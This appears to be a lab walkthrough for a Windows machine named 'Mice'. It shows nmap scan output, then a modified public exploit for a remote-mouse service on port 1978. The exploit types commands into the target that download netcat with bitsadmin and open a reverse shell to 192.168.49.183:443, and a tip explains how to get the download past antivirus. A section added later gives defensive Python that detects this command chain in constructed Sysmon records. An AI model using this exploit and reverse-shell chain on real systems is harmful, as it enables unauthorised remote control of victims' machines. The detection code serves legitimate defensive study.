Mice (Windows)

1978/tcp open  unisql?
| fingerprint-strings: 
|   DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s: 
|_    SIN 15win nop nop 300
1979/tcp open  unisql-java?
1980/tcp open  pearldoc-xact?
3389/tcp open  ms-wbt-server  Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2022-05-18T16:19:09+00:00
|_ssl-date: 2022-05-18T16:19:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2022-05-17T00:09:34
|_Not valid after:  2022-11-16T00:09:34
7680/tcp open  pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 1978 has a public exploit.

Modify the exploit script as follows:

from time import sleep

# MoveMouse, MousePress, SendString and the mouse constants are defined in the
# original exploit script this function replaces; only the commands typed into
# the target are changed here.
cmd1 = 'mkdir c:\\pwn'
cmd2 = 'bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe'
cmd3 = 'c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443'

def PopCalc(ip):
    # Move the pointer far to the bottom-left and click, then type each command
    # followed by Enter, pausing between keystroke batches.
    MoveMouse(-5000, 3000, ip)
    MousePress(mouse.leftClick, ip)
    sleep(1)
    SendString("cmd.exe", ip)
    sleep(1)
    SendString("\n", ip)
    sleep(1)
    SendString(cmd1, ip)
    sleep(1)
    SendString("\n", ip)
    sleep(1)
    SendString(cmd2, ip)
    sleep(1)
    SendString("\n", ip)
    # Give the bitsadmin transfer time to complete before launching the binary.
    sleep(25)
    SendString(cmd3, ip)
    sleep(1)
    SendString("\n", ip)
    print("SUCCESS!", ip)

Because of the antivirus setting on the target, the file has to be hosted on an actual web server (Apache) rather than the Python web server, or the transfer will not work.
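A defender-side counterpart to the command chain above, added here and not part of the original write-up: detection logic run over constructed Sysmon-style process-creation records that flags a bitsadmin download to an arbitrary local path and any later execution of the file it fetched, escalating when that process is handed a shell-exec argument. The record layout and the event lines are constructed for this example.

```python
import re

# Constructed Sysmon Event ID 1 style records (not real telemetry).
# Fields: timestamp | parent image | image | command line
SAMPLE_EVENTS = """\
2022-05-18T16:20:01Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe
2022-05-18T16:20:04Z|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe
2022-05-18T16:20:30Z|C:\\Windows\\System32\\cmd.exe|c:\\pwn\\nc.exe|c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443
2022-05-18T16:21:00Z|C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /list
"""

# bitsadmin /transfer <job> [/download] [/priority p] <remote URL> <local path>
BITS_DOWNLOAD = re.compile(
    r"bitsadmin(?:\.exe)?\s.*?/transfer\b.*?(https?://\S+)\s+(\S+)", re.I)
# "-e <program>" as used by netcat-style tools to attach a shell to the socket
SHELL_EXEC_ARG = re.compile(r"\s-e\s+(?:cmd|powershell)(?:\.exe)?\b", re.I)


def detect(events: str) -> list[tuple]:
    """Return alert tuples for BITS downloads to arbitrary paths and for any
    later process whose image is a file that BITS fetched earlier in the stream."""
    alerts = []
    fetched = {}  # lower-cased local path -> source URL
    for line in events.splitlines():
        ts, parent, image, cmdline = line.split("|", 3)
        m = BITS_DOWNLOAD.search(cmdline)
        if m:
            url, dest = m.group(1), m.group(2).lower()
            fetched[dest] = url
            alerts.append(("bits_download", ts, parent.lower(), url, dest))
        img = image.lower()
        if img in fetched:
            # The downloaded file is now running; note whether it was given a shell.
            with_shell = bool(SHELL_EXEC_ARG.search(cmdline))
            alerts.append(("fetched_file_exec", ts, img, fetched[img], with_shell))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(*alert)
```

The routine `bitsadmin /list` record produces no alert, so a plain transfer listing does not trip the rule; only a transfer with a remote URL does.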
